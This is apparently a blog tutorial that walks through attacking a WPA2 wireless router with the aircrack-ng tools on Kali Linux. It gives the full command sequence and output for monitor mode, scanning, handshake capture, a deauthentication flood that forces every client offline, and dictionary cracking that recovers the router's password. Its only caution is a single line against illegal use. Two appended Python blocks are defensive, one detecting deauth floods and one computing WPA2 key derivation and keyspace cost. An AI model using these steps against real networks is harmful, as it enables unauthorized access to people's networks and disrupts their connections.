Wireless router attack and WiFi password cracking in practice [penetration techniques]
2022-06-22 08:53:00 【BreezAm】
One. Preparation stage
- Attack host: Kali Linux
- Attack tools: aircrack-ng, airodump-ng, airmon-ng, aireplay-ng
- One wireless network card

My network card is called wlan0:
```
root@kali:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
```
Two. Attack phase
1. Stop NetworkManager
To prevent interference, we first need to stop NetworkManager (otherwise it keeps managing the wireless interface behind our back).
Stop NetworkManager:
```
sudo service network-manager stop
```
Kill any remaining processes that could interfere with the card:
```
sudo airmon-ng check kill
```
2. Enable monitor mode on the network card
Once monitor mode is enabled, the card can listen to nearby wireless routers.
Syntax: sudo airmon-ng start <adapter name>
Example:
```
sudo airmon-ng start wlan0
```
Output of the following form indicates that it was enabled successfully! (The output below was captured on a card that was already in monitor mode, which is why airmon-ng reports that it is already enabled.)
```
root@kali:~# sudo airmon-ng start wlan0mon
PHY Interface Driver Chipset
phy0 wlan0mon rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)
```
After it succeeds you will notice that the interface name has changed from wlan0 to wlan0mon:
```
root@kali:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
```
3. Capture packets (scan for nearby routers)
Capturing packets here means scanning the nearby routers through the network card. How far the scan reaches depends on the quality of your card. The scan reveals each router's MAC address (BSSID), channel (CH), WiFi name (ESSID), encryption method and so on.
Syntax: sudo airodump-ng <adapter name>
Example:
```
sudo airodump-ng wlan0mon
```
When the WiFi name of the router you want to attack (the target) appears, press CTRL+C to stop. The output looks like the listing below (my target is the router whose WiFi name is CMCC-QingFeng):
```
root@kali:~# airodump-ng wlan0mon
CH 13 ][ Elapsed: 26 mins ][ 2020-08-15 23:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:54:6A:6C:BA:C0 -50 407 4907 40 1 130 WPA2 CCMP PSK CMCC-QingFeng
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 22:C9:4E:48:C1:16 -78 0 - 1 0 12
80:54:6A:6C:BA:C0 38:37:8B:07:71:69 -18 0e- 6 0 534
80:54:6A:6C:BA:C0 7C:B3:7B:95:BA:50 -62 0e- 0e 8 2476
80:54:6A:6C:BA:C0 F4:70:AB:95:A1:14 -78 0e- 1 0 1375
80:54:6A:6C:BA:C0 70:C9:4E:48:C1:16 -76 0e- 1 396 2485 CMCC-QingFeng
Quitting...
```
4. Capture the handshake
The purpose of capturing the handshake packets is to prepare for the cracking step below: aircrack-ng tests dictionary candidates against the captured handshake.
Syntax:
```
sudo airodump-ng -c <channel> -w <output prefix> --bssid <MAC address> <adapter name>
```
Parameter description:
- -c: channel value
- -w: path prefix for the saved capture (airodump-ng appends a counter and extension, e.g. -01.cap)
- --bssid: MAC address of the target router
Example:
```
sudo airodump-ng -c 1 -w /root/admin --bssid 80:54:6A:6C:BA:C0 wlan0mon
```
5. Inject packets (deauthentication flood)
Continuously send deauthentication packets to the router. While this runs, every connected client is forced offline. When the handshake is captured (clients re-associate after being kicked off), it is shown in the top-right corner of the airodump-ng terminal from step 4, and the capture file is saved to the path you specified. Some encryption setups are not easy to crack; the outcome depends on many factors, such as dictionary strength and the host. In short, a strong dictionary is essential.
Syntax:
```
sudo aireplay-ng -0 <n> -a <BSSID> <adapter name>
```
Parameter description:
- -0: send deauthentication packets
- n: number of attacks (the number of deauthentication bursts sent to the router)
- -a: BSSID of the target router
- adapter name: the name of your network card, which you can find with sudo iwconfig
Example:
Do not close the terminal from step 4. Open a new terminal and enter the command below to attack the router. If you try to connect to this router you will find that you cannot connect at all, and if you were already connected you will see the client forced offline. How long this lasts depends on the number of attacks; in the example below the number of attacks is 5.
```
sudo aireplay-ng -0 5 -a 80:54:6A:6C:BA:C0 wlan0mon
```
```
root@kali:~# sudo aireplay-ng -0 5 -a 80:54:6A:6C:BA:C0 wlan0mon
00:34:39 Waiting for beacon frame (BSSID: 80:54:6A:6C:BA:C0) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
00:34:39 Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40 Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40 Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
```
Note: when you run the above command, all connected clients are forced offline. Bear in mind! Bear in mind! Bear in mind: do not use this to do anything illegal.
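A detection-side counterpart to the flood above, added here as an example that is not part of the original post: a small Python monitor that parses raw 802.11 deauthentication/disassociation frames and alerts when one BSSID sees a burst like the "DeAuth (code 7) to broadcast" lines in the aireplay-ng output. The frame layout and reason codes come from IEEE 802.11; the sample frames, timestamps, window and threshold are constructed for the demo, and the BSSID and client MAC are the ones from the capture above.

```python
"""Detect a deauthentication flood like the one aireplay-ng -0 produces in step 5.
Parses raw 802.11 management frames (radiotap header stripped), counts deauth/disassoc
frames per BSSID in a sliding window and alerts above a threshold. Test frames are
built in memory as fixtures only; nothing is transmitted."""
import struct
from collections import defaultdict, deque

DISASSOC, DEAUTH = 10, 12          # management-frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"

def parse_mgmt(frame: bytes):
    """Return (subtype, dst, src, bssid, reason) for a deauth/disassoc frame, else None."""
    if len(frame) < 26 or frame[0] & 0x0c or frame[0] >> 4 not in (DISASSOC, DEAUTH):
        return None                 # too short, not a management frame, or other subtype
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    # addr1 = receiver, addr2 = transmitter, addr3 = BSSID; reason code follows seq ctrl
    dst, src, bssid = mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])
    return frame[0] >> 4, dst, src, bssid, struct.unpack_from("<H", frame, 24)[0]

def detect_floods(frames, window=2.0, threshold=10):
    """frames: iterable of (timestamp_seconds, frame_bytes). One alert per flooding BSSID."""
    recent = defaultdict(deque)    # bssid -> timestamps still inside the window
    alerted, alerts = set(), []
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        _, dst, _, bssid, reason = parsed
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "count": len(q), "at": ts, "reason": reason,
                           "broadcast": dst == BROADCAST})   # broadcast deauths: red flag
    return alerts

def sample_frame(subtype, dst, src, bssid, reason):
    """Constructed test fixture: FC, duration, addr1-3, sequence control, reason code."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([subtype << 4, 0]) + b"\x00\x00" + raw(dst) + raw(src) + raw(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

def demo():
    ap = "80:54:6a:6c:ba:c0"       # BSSID of the router from the capture above
    # one unicast deauth from a client that is leaving (reason 3): normal traffic
    frames = [(0.0, sample_frame(DEAUTH, ap, "7c:b3:7b:95:ba:50", ap, 3))]
    # 64 broadcast deauths with reason 7 within ~3 s: the aireplay-ng pattern
    frames += [(5 + i * 0.05, sample_frame(DEAUTH, BROADCAST, ap, ap, 7)) for i in range(64)]
    return detect_floods(frames)
```

On a real sensor the frames would come from a monitor-mode capture; 802.11w (Protected Management Frames) is the configuration-side fix, since it makes forged deauths fail authentication at the client.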
6. WiFi password cracking
This step cracks the password. Whether it succeeds depends on how strong your dictionary is and how powerful your host is, plus some patience, haha!
Syntax:
```
aircrack-ng -w <dictionary path> <path to the .cap capture>
```
Example:
```
aircrack-ng -w /root/admin/directory/dic1 /root/admin/-01.cap
```
From the output below you can see that the password was cracked successfully; the password is guu3nif2 (KEY FOUND! [ guu3nif2 ]):
```
root@kali:~/admin# aircrack-ng -w /root/admin/directory/dic1 /root/admin/-01.cap
Reading packets, please wait...
Opening /root/admin/-01.cap
Read 165406 packets.
# BSSID ESSID Encryption
1 80:54:6A:6C:BA:C0 CMCC-QingFeng WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening /root/admin/-01.cap
Read 165406 packets.
1 potential targets
Aircrack-ng 1.6
[00:00:00] 1/1 keys tested (13.07 k/s)
Time left: --
KEY FOUND! [ guu3nif2 ]
Master Key : A7 21 22 70 BA 88 13 33 CE DB 99 89 A3 02 B4 0E
3E 70 BB FF D3 39 DA B0 70 B4 61 08 38 BF 9D 19
Transient Key : DC 87 B9 63 C4 D8 47 AE 0F 69 3E A3 E9 73 20 6E
DC B3 B7 6E DD 68 AB 4A 2F 0B 94 A3 6A 9A 53 2C
FA 30 6C 2B C8 8A 1C A8 73 2F 1B DB F8 A9 3D 56
9B 91 3B 23 3D 70 AA 89 B3 02 96 27 D6 86 A4 5F
EAPOL HMAC : 05 48 48 0A CB 6D 82 89 26 93 8B C2 3F 31 0C 86
```
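Why the dictionary decides the outcome, as an added example (not code from the post): the Master Key that aircrack-ng prints is the WPA2 pairwise master key (PMK), derived with PBKDF2-HMAC-SHA1 from the passphrase and the SSID, so every dictionary candidate costs 4096 iterations and a precomputed table only works for one SSID. The passphrase and SSID come from the output above; the 13070/s rate is the one shown there, and the 36-character, 8-symbol keyspace used in the test is an illustrative assumption.

```python
"""WPA2-PSK key derivation: what step 6 actually has to compute per candidate.
The "Master Key" aircrack-ng prints is the PMK, derived from the passphrase and
the SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 32 bytes). Every candidate the
cracker tries must redo this derivation, which is what bounds the k/s rate."""
import hashlib
import hmac

def pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def master_key_matches(passphrase: str, ssid: str, master_key_hex: str) -> bool:
    """Check a passphrase against a printed Master Key line (constant-time compare)."""
    expected = bytes.fromhex(master_key_hex.replace(" ", ""))
    return hmac.compare_digest(pmk(passphrase, ssid), expected)

def years_to_exhaust(charset_size: int, length: int, rate_per_s: float) -> float:
    """Worst-case time to try every passphrase of this shape at the cracker's rate.
    Use this to size a passphrase policy: a random 8-symbol [a-z0-9] key at the CPU
    rate shown above (13.07 k/s) already takes years, but GPU crackers are far faster."""
    return charset_size ** length / rate_per_s / (365 * 24 * 3600)
```

The SSID acts as the salt, so a router left on a default SSID shares its table with every other router using that name, which is one more reason to change it along with the passphrase.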